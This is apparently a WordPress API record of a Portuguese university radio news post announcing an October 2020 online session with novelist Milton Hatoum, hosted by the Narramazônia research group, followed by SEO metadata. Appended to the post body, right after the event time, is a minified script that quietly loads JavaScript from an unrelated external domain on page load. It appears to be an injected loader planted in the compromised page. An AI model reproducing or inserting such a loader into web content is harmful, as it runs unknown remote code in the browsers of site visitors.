{"id":7660,"date":"2020-10-02T15:13:33","date_gmt":"2020-10-02T18:13:33","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=7660"},"modified":"2025-10-21T10:01:38","modified_gmt":"2025-10-21T13:01:38","slug":"narramazonia-promove-sessao-interativa-com-milton-hatoum","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/","title":{"rendered":"Narramaz\u00f4nia promove sess\u00e3o interativa com Milton Hatoum"},"content":{"rendered":"<p>As atividades do segundo semestre de 2020, do grupo de pesquisa Narramaz\u00f4nia, iniciam com um evento comemorativo dos seus cinco anos de implanta\u00e7\u00e3o, completados agora no m\u00eas de outubro. Na sua sess\u00e3o interativa de abertura, a ser realizada no pr\u00f3ximo dia 09 de outubro, um dos eixos de di\u00e1logo do grupo ser\u00e1 o trabalho do escritor Milton Hatoum, com a confer\u00eancia \u201cNarrativas, rios de mem\u00f3rias\u201d.<\/p>\n<p>Milton Hatoum representa, considerando o conjunto de sua obra, um dos mais importantes escritores brasileiros da atualidade. Autor de um n\u00famero expressivo de obras, Hatoum trabalha seus textos na argamassa da mem\u00f3ria uma fic\u00e7\u00e3o vibrante: ora po\u00e9tica, ora veross\u00edmil; obra que ressignifica a Amaz\u00f4nia, na qual destaca-se Relato de um Certo Oriente e Dois irm\u00e3os; com o primeiro ganhou o pr\u00eamio Jabuti de melhor romance; o segundo foi eleito o melhor romance brasileiro; ou quando reescreve os desconcertos do Brasil durante a ditadura militar, numa trilogia denominada &#8220;O lugar mais sombrio&#8221;, iniciada por A Noite da Espera e continuada por Pontos de Fuga.<\/p>\n<p>O trabalho desse amazonense tem um estilo singular de escrita, com di\u00e1logo com mestres da literatura universal e nacional, conquistando um lugar de destaque na Literatura Brasileira. Autor engajados na causa dos direitos civis e democr\u00e1ticos, Hatoum tem fortes liga\u00e7\u00f5es afetivas com Bel\u00e9m do Par\u00e1, inclusive identifica-a como &#8220;a minha cidade&#8221;. Em parceria com Benedito Nunes, fil\u00f3sofo paraense, publicou Cr\u00f4nica de duas cidades: Bel\u00e9m e Manaus, em 2006. Sua literatura ganhou o mundo. Seus livros foram publicados em mais de 15 pa\u00edses, com premia\u00e7\u00f5es dentro e fora do Brasil.<\/p>\n<p>Na retomada dos trabalhos do Narramaz\u00f4nia, Milton Hatoum pretende dialogar com os participantes destacando as diversas formas de narrar. O escritor amazonense ter\u00e1 como anfitri\u00f5es os professores Alda Costa e V\u00e2nia Torres\u00a0 (PPGCOM UFPA) e Paulo Nunes (PPGCLC Unama), coordenadores do Narramaz\u00f4nia, sendo mediadores na sess\u00e3o interativa. O Narramaz\u00f4nia foi implantado em 2015. Inicialmente nasceu com um car\u00e1ter de estudos e reflex\u00f5es sobre as narrativas. Hoje, al\u00e9m desse car\u00e1ter inicial, incorporou os projetos de pesquisa dos seus pesquisadores, configurando-se em projeto macro ou guarda-chuva, que abriga outros projetos que investigam e pesquisam as narrativas na Amaz\u00f4nia.<\/p>\n<p>Sess\u00e3o Interativa do Narramaz\u00f4nia: MILTON HATOUM: narrativas, rios de mem\u00f3rias<br \/>\nData: 09\/10\/2020<br \/>\nTransmiss\u00e3o pelo Google Meet e Youtube<br \/>\nHora: 16h<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Narramaz\u00f4nia promove sess\u00e3o interativa com Milton Hatoum\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/\" aria-label=\"Read more about Narramaz\u00f4nia promove sess\u00e3o interativa com Milton Hatoum\">Ler mais<\/a><\/p>\n","protected":false},"author":2,"featured_media":7661,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[696],"tags":[],"class_list":["post-7660","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-noticias"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Narramaz\u00f4nia promove sess\u00e3o interativa com Milton Hatoum<\/title>\n<meta name=\"description\" content=\"O escritor amazonense Milton Hatoum \u00e9 o convidado de um encontro virtual realizado pelo grupo de pesquisa Narramaz\u00f4nia no dia 9 de outubro, \u00e0s 16h.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Narramaz\u00f4nia promove sess\u00e3o interativa com Milton Hatoum\" \/>\n<meta property=\"og:description\" content=\"O escritor amazonense Milton Hatoum \u00e9 o convidado de um encontro virtual realizado pelo grupo de pesquisa Narramaz\u00f4nia no dia 9 de outubro, \u00e0s 16h.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2020-10-02T18:13:33+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T13:01:38+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/10\/MILTON-NO-NARRA.jpg?fit=1280%2C1280&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"1280\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Fabr\u00edcio Queiroz\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Fabr\u00edcio Queiroz\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/\"},\"author\":{\"name\":\"Fabr\u00edcio Queiroz\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\"},\"headline\":\"Narramaz\u00f4nia promove sess\u00e3o interativa com Milton Hatoum\",\"datePublished\":\"2020-10-02T18:13:33+00:00\",\"dateModified\":\"2025-10-21T13:01:38+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/\"},\"wordCount\":416,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/10\/MILTON-NO-NARRA.jpg?fit=1280%2C1280&ssl=1\",\"articleSection\":[\"UFPA Not\u00edcias\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/\",\"name\":\"Narramaz\u00f4nia promove sess\u00e3o interativa com Milton Hatoum\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/10\/MILTON-NO-NARRA.jpg?fit=1280%2C1280&ssl=1\",\"datePublished\":\"2020-10-02T18:13:33+00:00\",\"dateModified\":\"2025-10-21T13:01:38+00:00\",\"description\":\"O escritor amazonense Milton Hatoum \u00e9 o convidado de um encontro virtual realizado pelo grupo de pesquisa Narramaz\u00f4nia no dia 9 de outubro, \u00e0s 16h.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/10\/MILTON-NO-NARRA.jpg?fit=1280%2C1280&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/10\/MILTON-NO-NARRA.jpg?fit=1280%2C1280&ssl=1\",\"width\":1280,\"height\":1280},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Narramaz\u00f4nia promove sess\u00e3o interativa com Milton Hatoum\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\",\"name\":\"Fabr\u00edcio Queiroz\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"caption\":\"Fabr\u00edcio Queiroz\"},\"description\":\"Editor e Jornalista respons\u00e1vel\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Narramaz\u00f4nia promove sess\u00e3o interativa com Milton Hatoum","description":"O escritor amazonense Milton Hatoum \u00e9 o convidado de um encontro virtual realizado pelo grupo de pesquisa Narramaz\u00f4nia no dia 9 de outubro, \u00e0s 16h.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/","og_locale":"pt_BR","og_type":"article","og_title":"Narramaz\u00f4nia promove sess\u00e3o interativa com Milton Hatoum","og_description":"O escritor amazonense Milton Hatoum \u00e9 o convidado de um encontro virtual realizado pelo grupo de pesquisa Narramaz\u00f4nia no dia 9 de outubro, \u00e0s 16h.","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2020-10-02T18:13:33+00:00","article_modified_time":"2025-10-21T13:01:38+00:00","og_image":[{"width":1280,"height":1280,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/10\/MILTON-NO-NARRA.jpg?fit=1280%2C1280&ssl=1","type":"image\/jpeg"}],"author":"Fabr\u00edcio Queiroz","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Fabr\u00edcio Queiroz","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/"},"author":{"name":"Fabr\u00edcio Queiroz","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096"},"headline":"Narramaz\u00f4nia promove sess\u00e3o interativa com Milton Hatoum","datePublished":"2020-10-02T18:13:33+00:00","dateModified":"2025-10-21T13:01:38+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/"},"wordCount":416,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/10\/MILTON-NO-NARRA.jpg?fit=1280%2C1280&ssl=1","articleSection":["UFPA Not\u00edcias"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/","name":"Narramaz\u00f4nia promove sess\u00e3o interativa com Milton Hatoum","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/10\/MILTON-NO-NARRA.jpg?fit=1280%2C1280&ssl=1","datePublished":"2020-10-02T18:13:33+00:00","dateModified":"2025-10-21T13:01:38+00:00","description":"O escritor amazonense Milton Hatoum \u00e9 o convidado de um encontro virtual realizado pelo grupo de pesquisa Narramaz\u00f4nia no dia 9 de outubro, \u00e0s 16h.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/10\/MILTON-NO-NARRA.jpg?fit=1280%2C1280&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/10\/MILTON-NO-NARRA.jpg?fit=1280%2C1280&ssl=1","width":1280,"height":1280},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/narramazonia-promove-sessao-interativa-com-milton-hatoum\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Narramaz\u00f4nia promove sess\u00e3o interativa com Milton Hatoum"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096","name":"Fabr\u00edcio Queiroz","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","caption":"Fabr\u00edcio Queiroz"},"description":"Editor e Jornalista respons\u00e1vel","url":"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/10\/MILTON-NO-NARRA.jpg?fit=1280%2C1280&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-1Zy","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7660","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=7660"}],"version-history":[{"count":2,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7660\/revisions"}],"predecessor-version":[{"id":17226,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7660\/revisions\/17226"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/7661"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=7660"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=7660"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=7660"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}